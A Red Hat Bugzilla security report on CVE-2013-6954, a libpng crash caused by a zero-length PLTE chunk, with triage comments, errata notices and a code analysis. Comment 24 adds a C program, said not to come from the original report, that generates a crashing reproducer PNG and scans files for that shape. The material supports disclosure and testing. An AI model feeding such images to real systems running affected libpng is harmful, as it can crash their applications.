Bug 1045561 - (CVE-2013-6954) CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Assigned To: Red Hat Product Security
impact=low,public=20131219,reported=2...
Keywords: Security
Duplicates: CVE-2014-2405
Depends On: 1056853 1056854 1056855 1056856 1056857 1056858 1056859 1056860 1056861 1056863 1056864
Blocks: 1045564 1082776
Reported: 2013-12-20 13:02 EST by Vincent Danen
Modified: 2015-10-15 14:09 EDT
CC List: 16 users

See Also:
Fixed In Version: libpng 1.6.8
Doc Type: Bug Fix
Last Closed: 2014-02-11 00:03:42 EST
Attachments
tarball with testcase (296 bytes, application/gzipped-tar), 2014-02-07 12:06 EST, Tristan Matthews

Description Vincent Danen 2013-12-20 13:02:47 EST
libpng 1.6.8 was released [1] and notes the following fix:

Handle zero-length PLTE chunk or NULL palette with png_error() instead of png_chunk_report(), which by default issues a warning rather than an error, leading to later reading from a NULL pointer (png_ptr->palette) in png_do_expand_palette(). This is CVE-2013-6954 and VU#650142.

The git commit to fix is available [3].

[1] http://sourceforge.net/projects/libpng/files/libpng16/1.6.8/Gnupg/
[2] http://www.kb.cert.org/vuls/id/650142
[3] http://sourceforge.net/p/libpng/code/ci/1faa6ff32c648acfe3cf30a58d31d7aebc24968c
Comment 1 Petr Hracek 2014-01-16 03:53:21 EST
In Fedora we have currently libpng 1.6.8.
https://bugzilla.redhat.com/show_bug.cgi?id=1033049
When the BZ for RHEL7 and older is created, libpng will be patched.
Comment 7 Huzaifa S. Sidhpurwala 2014-01-22 23:46:08 EST
Created mingw-libpng tracking bugs for this issue:

Affects: fedora-19 [bug 1056858]
Affects: fedora-20 [bug 1056859]
Comment 8 Huzaifa S. Sidhpurwala 2014-01-22 23:46:13 EST
Created mingw32-libpng tracking bugs for this issue:

Affects: epel-all [bug 1056860]
Comment 9 Huzaifa S. Sidhpurwala 2014-01-22 23:46:17 EST
Created libpng tracking bugs for this issue:

Affects: fedora-20 [bug 1056853]
Affects: fedora-19 [bug 1056854]
Comment 10 Huzaifa S. Sidhpurwala 2014-01-22 23:46:21 EST
Created libpng10 tracking bugs for this issue:

Affects: fedora-all [bug 1056857]
Affects: epel-6 [bug 1056861]
Comment 11 Huzaifa S. Sidhpurwala 2014-01-22 23:46:25 EST
Created libpng12 tracking bugs for this issue:

Affects: fedora-all [bug 1056856]
Comment 12 Huzaifa S. Sidhpurwala 2014-01-22 23:46:28 EST
Created libpng15 tracking bugs for this issue:

Affects: fedora-20 [bug 1056855]
Comment 14 Paul Howarth 2014-01-23 08:06:13 EST
Does anyone have a reproducer image for the null/empty palette issues, so I can test a fix for libpng10 (which has slightly different code)?
Comment 17 Fedora Update System 2014-02-06 22:08:54 EST
libpng10-1.0.60-6.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 18 Fedora Update System 2014-02-06 22:09:42 EST
libpng10-1.0.60-6.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 19 Tristan Matthews 2014-02-07 12:06:32 EST
Created attachment 860584 [details]
tarball with testcase

Had to put the file in a tarball as firefox was trying to preview and crashing as expected.
Comment 20 Paul Howarth 2014-02-07 14:24:24 EST
Upstream tells me that only libpng 1.6.1 to 1.6.7 were affected by this issue.

I've just tried an unpatched libpng 1.0.61 with xv, which had no problem loading the testcase image.
Comment 21 Huzaifa S. Sidhpurwala 2014-02-11 00:00:29 EST
Based on the reproducer posted in comment #19, it seems that this issue only affects libpng-1.6. It does not affect older versions of libpng.

Statement:

Not Vulnerable. This issue does not affect the version of libpng as shipped with Red Hat Enterprise Linux 5 and 6.
Comment 22 Fedora Update System 2014-02-24 00:58:08 EST
libpng10-1.0.61-1.el6 has been pushed to the Fedora EPEL 6 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 23 Fedora Update System 2014-04-02 05:26:56 EDT
mingw-libpng-1.6.10-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 24 Huzaifa S. Sidhpurwala 2014-04-10 04:21:40 EDT
Analysis:

libpng-1.2:
===========

png_set_PLTE() is called with the value num_palette=0. Later, at:

454    if (num_palette < 0 || num_palette > PNG_MAX_PALETTE_LENGTH)

the bounds of num_palette are checked, but there is no check for num_palette=0.

Then memory is malloced for the png_ptr->palette structure at:

 477    png_ptr->palette = (png_colorp)png_calloc(png_ptr,
 478       PNG_MAX_PALETTE_LENGTH * png_sizeof(png_color));

This mallocs 256 * 3 bytes of memory for the png_ptr->palette structure. Later, at:

 479    png_memcpy(png_ptr->palette, palette, num_palette * png_sizeof(png_color));

zero bytes are copied into png_ptr->palette because num_palette = 0, so this memcpy looks like:

png_memcpy(png_ptr->palette, palette, 0)

So png_ptr->palette is filled with 256 * 3 zeros (due to calloc).

Later, when this structure is referenced in png_do_expand_palette(), the output is zero and there is no crash.

libpng 1.6:
===========

Here in png_set_PLTE() there is a check for num_palette = 0 at:

 523    if ((num_palette > 0 && palette == NULL) ||
 524       (num_palette == 0
 525 #        ifdef PNG_MNG_FEATURES_SUPPORTED
 526             && (png_ptr->mng_features_permitted & PNG_FLAG_MNG_EMPTY_PLTE) == 0
 527 #        endif
 528       ))
 529    {
 530       png_chunk_report(png_ptr, "Invalid palette", PNG_CHUNK_ERROR);
 531       return;
 532    }

So when num_palette is zero, a warning is printed and the function exits. However, no memory is malloced for the png_ptr->palette structure, and it is pointing to zero.

Later, when it's referenced in png_do_expand_palette(), there is a null pointer deref and it crashes.
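The two code paths in the analysis above differ only in what png_set_PLTE() does when it is handed a PLTE chunk of length zero. As an added example (not code from the bug report, from libpng, or from any of the commenters), the C program below builds the input that exercises that path, a minimal 8-bit paletted PNG whose PLTE chunk has length 0 and valid chunk CRCs, and walks a PNG's chunk list to flag files of that shape. The output file name, the hand-assembled IDAT stream, the all-red test palette and the helper names are constructed for this illustration; the program does not link against libpng, so it only tells you whether an image has the shape described in the analysis, not whether a given libpng build crashes on it.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
static const uint8_t PNG_SIG[8] = {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};

/* PNG chunk CRC-32 (reflected, polynomial 0xEDB88320) over chunk type + data. */
static uint32_t png_crc32(const uint8_t *buf, size_t len)
{
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        c ^= buf[i];
        for (int k = 0; k < 8; k++)
            c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return c ^ 0xFFFFFFFFu;
}

static void put_be32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v;
}
static uint32_t get_be32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Emit one chunk (length, type, data, CRC) at out; return bytes written. */
static size_t put_chunk(uint8_t *out, const char *type, const uint8_t *data, uint32_t len)
{
    put_be32(out, len);
    memcpy(out + 4, type, 4);
    if (len) memcpy(out + 8, data, len);
    put_be32(out + 8 + len, png_crc32(out + 4, 4 + (size_t)len));
    return 12 + (size_t)len;
}

/* Build a 1x1, 8-bit, colour-type-3 (paletted) PNG whose PLTE carries plte_len
   bytes of palette data; plte_len == 0 is the zero-length PLTE from the report.
   IDAT is a hand-assembled stored zlib stream (filter byte + one pixel index). */
size_t build_paletted_png(uint8_t *out, size_t cap, const uint8_t *plte, uint32_t plte_len)
{
    static const uint8_t ihdr[13] = {0,0,0,1, 0,0,0,1, 8, 3, 0, 0, 0};
    static const uint8_t idat[13] = {0x78,0x01, 0x01,0x02,0x00,0xFD,0xFF, 0x00,0x00, 0x00,0x02,0x00,0x01};
    size_t n = 8;
    if (cap < 8 + 25 + 12 + (size_t)plte_len + 25 + 12) return 0;   /* 0 = cap too small */
    memcpy(out, PNG_SIG, 8);
    n += put_chunk(out + n, "IHDR", ihdr, 13);
    n += put_chunk(out + n, "PLTE", plte, plte_len);
    n += put_chunk(out + n, "IDAT", idat, 13);
    n += put_chunk(out + n, "IEND", NULL, 0);
    return n;
}

/* Walk the chunk list. Returns 1 for a colour-type-3 image whose PLTE chunk has
   length 0 (the shape that leaves png_ptr->palette NULL in libpng 1.6.1-1.6.7),
   0 otherwise, -1 if not well formed (bad signature, truncation, bad CRC, no IEND). */
int has_empty_plte(const uint8_t *buf, size_t len)
{
    int color_type = -1, saw_plte = 0, saw_iend = 0;
    uint32_t plte_len = 0;
    size_t off = 8;
    if (len < 8 || memcmp(buf, PNG_SIG, 8) != 0) return -1;
    while (off + 12 <= len) {
        uint32_t clen = get_be32(buf + off);
        const uint8_t *type = buf + off + 4;           /* chunk data starts at type + 4 */
        if (clen > len - off - 12) return -1;
        if (get_be32(type + 4 + clen) != png_crc32(type, 4 + (size_t)clen)) return -1;
        if (memcmp(type, "IHDR", 4) == 0 && clen == 13) color_type = type[4 + 9];
        else if (memcmp(type, "PLTE", 4) == 0) { saw_plte = 1; plte_len = clen; }
        else if (memcmp(type, "IEND", 4) == 0) { saw_iend = 1; break; }
        off += 12 + (size_t)clen;
    }
    if (!saw_iend) return -1;
    return (color_type == 3 && saw_plte && plte_len == 0) ? 1 : 0;
}

/* Self-check: build an image with plte_len bytes of an all-red palette (constructed),
   optionally truncate it to keep_bytes (0 = keep everything), and scan it. */
int scan_generated(uint32_t plte_len, size_t keep_bytes)
{
    uint8_t pal[256 * 3], img[1024]; size_t n;
    if (plte_len > sizeof pal) return -1;
    for (size_t i = 0; i < sizeof pal; i++) pal[i] = (i % 3 == 0) ? 0xFF : 0x00;
    n = build_paletted_png(img, sizeof img, pal, plte_len);
    if (n == 0) return -1;
    if (keep_bytes && keep_bytes < n) n = keep_bytes;
    return has_empty_plte(img, n);
}

/* Write the zero-length-PLTE variant to disk for feeding to a libpng-linked viewer. */
int main(void)
{
    uint8_t img[128];
    size_t n = build_paletted_png(img, sizeof img, NULL, 0);
    FILE *f = n ? fopen("empty-plte.png", "wb") : NULL;
    if (!f) return 1;
    fwrite(img, 1, n, f);
    fclose(f);
    printf("empty-plte.png: %zu bytes, zero-length PLTE: %d\n", n, has_empty_plte(img, n));
    return 0;
}
```

Compile with any C99 compiler and run it; the resulting empty-plte.png can then be opened with a tool linked against the libpng build under test (comment 20 reports that libpng 1.0 loads such an image without complaint, while 1.6.1 to 1.6.7 are the affected releases). The scanner verifies every chunk CRC and insists on an IEND so that a reproducer is judged as a well-formed PNG rather than as arbitrary bytes; a truncated or bit-flipped file reports -1 instead of a false negative.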
Comment 25 errata-xmlrpc 2014-04-17 05:30:51 EDT
This issue has been addressed in following products:

  Oracle Java for Red Hat Enterprise Linux 6
  Oracle Java for Red Hat Enterprise Linux 5

Via RHSA-2014:0413 https://rhn.redhat.com/errata/RHSA-2014-0413.html
Comment 26 errata-xmlrpc 2014-04-17 05:33:54 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 6
  Supplementary for Red Hat Enterprise Linux 5

Via RHSA-2014:0412 https://rhn.redhat.com/errata/RHSA-2014-0412.html
Comment 27 Stefan Cornelius 2014-04-17 06:27:23 EDT
OpenJDK upstream commit:
http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/df3f9871ee6f
Comment 28 errata-xmlrpc 2014-04-17 07:42:04 EDT
This issue has been addressed in following products:

  Oracle Java for Red Hat Enterprise Linux 6
  Oracle Java for Red Hat Enterprise Linux 5

Via RHSA-2014:0414 https://rhn.redhat.com/errata/RHSA-2014-0414.html
Comment 29 errata-xmlrpc 2014-05-13 15:48:13 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 5
  Supplementary for Red Hat Enterprise Linux 6

Via RHSA-2014:0486 https://rhn.redhat.com/errata/RHSA-2014-0486.html
Comment 30 errata-xmlrpc 2014-05-15 13:29:34 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 5
  Supplementary for Red Hat Enterprise Linux 6

Via RHSA-2014:0508 https://rhn.redhat.com/errata/RHSA-2014-0508.html
Comment 31 Tomas Hoger 2014-06-09 05:07:33 EDT
*** Bug 1106391 has been marked as a duplicate of this bug. ***
Comment 32 errata-xmlrpc 2014-06-10 09:12:36 EDT
This issue has been addressed in following products:

  Supplementary for Red Hat Enterprise Linux 7

Via RHSA-2014:0705 https://rhn.redhat.com/errata/RHSA-2014-0705.html
Comment 33 errata-xmlrpc 2014-07-29 11:41:13 EDT
This issue has been addressed in following products:

  Red Hat Network Satellite Server v 5.4
  Red Hat Network Satellite Server v 5.5
  Red Hat Satellite Server v 5.6

Via RHSA-2014:0982 https://rhn.redhat.com/errata/RHSA-2014-0982.html
